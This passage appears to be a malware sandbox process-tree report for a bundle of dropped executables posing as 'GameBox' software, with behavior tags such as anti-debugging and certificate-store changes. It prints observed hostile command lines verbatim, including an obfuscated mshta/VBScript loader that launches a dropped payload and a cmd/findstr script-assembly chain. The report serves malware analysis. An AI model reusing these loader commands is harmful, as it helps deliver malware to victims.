- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\2809526.exe"C:\Users\Admin\AppData\Roaming\2809526.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\3620530.exe"C:\Users\Admin\AppData\Roaming\3620530.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\1753705.exe"C:\Users\Admin\AppData\Roaming\1753705.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6188 -s 24407⤵
- Program crash
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵
-
C:\Users\Admin\Documents\lzODcMBQZNC5JRzzMB9EEzGl.exe"C:\Users\Admin\Documents\lzODcMBQZNC5JRzzMB9EEzGl.exe"6⤵
-
C:\Users\Admin\Documents\ZBInCtkxp4hLnnaRsIXws06i.exe"C:\Users\Admin\Documents\ZBInCtkxp4hLnnaRsIXws06i.exe"6⤵
-
C:\Users\Admin\Documents\tyn8Hmeikfo5QRuxfJXFH4Tm.exe"C:\Users\Admin\Documents\tyn8Hmeikfo5QRuxfJXFH4Tm.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\tyn8Hmeikfo5QRuxfJXFH4Tm.exeC:\Users\Admin\Documents\tyn8Hmeikfo5QRuxfJXFH4Tm.exe7⤵
-
C:\Users\Admin\Documents\CJhUHcHxfICvPKKREKPPk4Bb.exe"C:\Users\Admin\Documents\CJhUHcHxfICvPKKREKPPk4Bb.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\02oLXtu1U1IJhVSt20jm10EV.exe"C:\Users\Admin\Documents\02oLXtu1U1IJhVSt20jm10EV.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\NqmlIGI7TY3dwE9Gw4uXurUH.exe"C:\Users\Admin\Documents\NqmlIGI7TY3dwE9Gw4uXurUH.exe"6⤵
-
C:\Users\Admin\Documents\jGg35O1l9wghJXyysFy8Uwi7.exe"C:\Users\Admin\Documents\jGg35O1l9wghJXyysFy8Uwi7.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\a1Xq_jbwcre_prAXvCWXX_tG.exe"C:\Users\Admin\Documents\a1Xq_jbwcre_prAXvCWXX_tG.exe"6⤵
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\LNmyiwBkxK6HUosZXAjNN6XG.exe"C:\Users\Admin\Documents\LNmyiwBkxK6HUosZXAjNN6XG.exe"6⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\LNmyiwBkxK6HUosZXAjNN6XG.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\LNmyiwBkxK6HUosZXAjNN6XG.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\LNmyiwBkxK6HUosZXAjNN6XG.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\LNmyiwBkxK6HUosZXAjNN6XG.exe" ) do taskkill -f -iM "%~NxA"8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "LNmyiwBkxK6HUosZXAjNN6XG.exe"9⤵
- Executes dropped EXE
- Kills process with taskkill
-
C:\Users\Admin\Documents\K7p56my92QqHSgkozMCG0nfC.exe"C:\Users\Admin\Documents\K7p56my92QqHSgkozMCG0nfC.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3388 -s 3207⤵
- Program crash
-
C:\Users\Admin\Documents\NV0_9lowzg4GYOACtmtMjGu4.exe"C:\Users\Admin\Documents\NV0_9lowzg4GYOACtmtMjGu4.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 256 -s 3167⤵
- Program crash
-
C:\Users\Admin\Documents\zdTWC7aek9sTreenfaBmkDSm.exe"C:\Users\Admin\Documents\zdTWC7aek9sTreenfaBmkDSm.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 3127⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Documents\LHgVRDK8Jk2dEd16x4l39vr4.exe"C:\Users\Admin\Documents\LHgVRDK8Jk2dEd16x4l39vr4.exe"6⤵
-
C:\Users\Admin\Documents\LHgVRDK8Jk2dEd16x4l39vr4.exe"C:\Users\Admin\Documents\LHgVRDK8Jk2dEd16x4l39vr4.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\T3N67TUNNjUogZ_9BDQRPjf7.exe"C:\Users\Admin\Documents\T3N67TUNNjUogZ_9BDQRPjf7.exe"6⤵
-
C:\Users\Admin\AppData\Roaming\3397192.exe"C:\Users\Admin\AppData\Roaming\3397192.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7660 -s 22528⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\3180045.exe"C:\Users\Admin\AppData\Roaming\3180045.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 24368⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\1757720.exe"C:\Users\Admin\AppData\Roaming\1757720.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\7916684.exe"C:\Users\Admin\AppData\Roaming\7916684.exe"7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\Documents\7O8PKXnAxyPdFQWPEtiNd_yL.exe"C:\Users\Admin\Documents\7O8PKXnAxyPdFQWPEtiNd_yL.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\MkQWsmoZMQ879Sn93NLBSU_7.exe"C:\Users\Admin\Documents\MkQWsmoZMQ879Sn93NLBSU_7.exe"6⤵
-
C:\Users\Admin\Documents\MkQWsmoZMQ879Sn93NLBSU_7.exeC:\Users\Admin\Documents\MkQWsmoZMQ879Sn93NLBSU_7.exe7⤵
-
C:\Users\Admin\Documents\MkQWsmoZMQ879Sn93NLBSU_7.exeC:\Users\Admin\Documents\MkQWsmoZMQ879Sn93NLBSU_7.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\hsqxUqb1LUjM5gvq6fJZHFZH.exe"C:\Users\Admin\Documents\hsqxUqb1LUjM5gvq6fJZHFZH.exe"6⤵
-
C:\Users\Admin\Documents\6DqSmj9emKgTP7eL9aRhuyBi.exe"C:\Users\Admin\Documents\6DqSmj9emKgTP7eL9aRhuyBi.exe"6⤵
-
C:\Users\Admin\Documents\6DqSmj9emKgTP7eL9aRhuyBi.exe"C:\Users\Admin\Documents\6DqSmj9emKgTP7eL9aRhuyBi.exe"7⤵
-
C:\Users\Admin\Documents\lmuTCMXCfuf8hyEUJJMPciVI.exe"C:\Users\Admin\Documents\lmuTCMXCfuf8hyEUJJMPciVI.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2807⤵
- Program crash
-
C:\Users\Admin\Documents\T7HecCDZomR7Jvn0IhX_IBOT.exe"C:\Users\Admin\Documents\T7HecCDZomR7Jvn0IhX_IBOT.exe"6⤵
- Loads dropped DLL
-
C:\Users\Admin\Documents\u2LfDzzWeEg8llmL3rtI7Is9.exe"C:\Users\Admin\Documents\u2LfDzzWeEg8llmL3rtI7Is9.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6768 -s 2567⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\wsifjdbSMsAkBBd9GW4zMEVB.exe"C:\Users\Admin\Documents\wsifjdbSMsAkBBd9GW4zMEVB.exe"6⤵
-
C:\Users\Admin\Documents\wsifjdbSMsAkBBd9GW4zMEVB.exe"C:\Users\Admin\Documents\wsifjdbSMsAkBBd9GW4zMEVB.exe" -q7⤵
-
C:\Users\Admin\Documents\ysCFU4JxCe8XfaSMA6geAvW4.exe"C:\Users\Admin\Documents\ysCFU4JxCe8XfaSMA6geAvW4.exe"6⤵
-
C:\Users\Admin\Documents\9bvp6tgEvkZNIB14ADuzB9aF.exe"C:\Users\Admin\Documents\9bvp6tgEvkZNIB14ADuzB9aF.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DCKSL.tmp\9bvp6tgEvkZNIB14ADuzB9aF.tmp"C:\Users\Admin\AppData\Local\Temp\is-DCKSL.tmp\9bvp6tgEvkZNIB14ADuzB9aF.tmp" /SL5="$601FA,138429,56832,C:\Users\Admin\Documents\9bvp6tgEvkZNIB14ADuzB9aF.exe"7⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-1TUIB.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-1TUIB.tmp\Setup.exe" /Verysilent8⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵
- Loads dropped DLL
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629407961 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵
-
C:\Users\Admin\Documents\rKsE4nIdcbQ0S81Vh5mPESTM.exe"C:\Users\Admin\Documents\rKsE4nIdcbQ0S81Vh5mPESTM.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6540 -s 2567⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tmp518C_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp518C_tmp.exe"6⤵
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks9⤵
-
C:\Windows\SysWOW64\PING.EXEping YJTUIPJF -n 309⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i9⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i18⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i19⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i20⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i21⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i22⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i23⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i24⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i25⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i28⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i29⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i30⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i31⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i32⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i33⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i34⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i35⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i36⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i37⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i38⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i39⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i40⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i41⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i42⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i43⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i44⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i45⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i46⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i47⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i48⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i49⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i50⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i51⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i52⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i53⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i54⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i55⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i56⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i57⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i58⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i59⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i60⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i61⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i62⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i63⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i64⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i65⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i66⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i67⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i68⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i69⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i70⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i71⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i72⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i73⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i74⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i75⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i76⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i77⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i78⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i79⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i80⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i81⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i82⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i83⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵
- Executes dropped EXE
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵
- Executes dropped EXE
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv spk7Mq6mdk6K+NQLk1ou5Q.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 792 -ip 7921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3972 -ip 39721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1184 -ip 11841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 960 -ip 9601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1232 -ip 12321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1588 -ip 15881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 1172 -ip 11721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 2112 -ip 21121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 2488 -ip 24881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1452 -ip 14521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-ECFH8.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-ECFH8.tmp\MediaBurner2.tmp" /SL5="$20368,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"1⤵
-
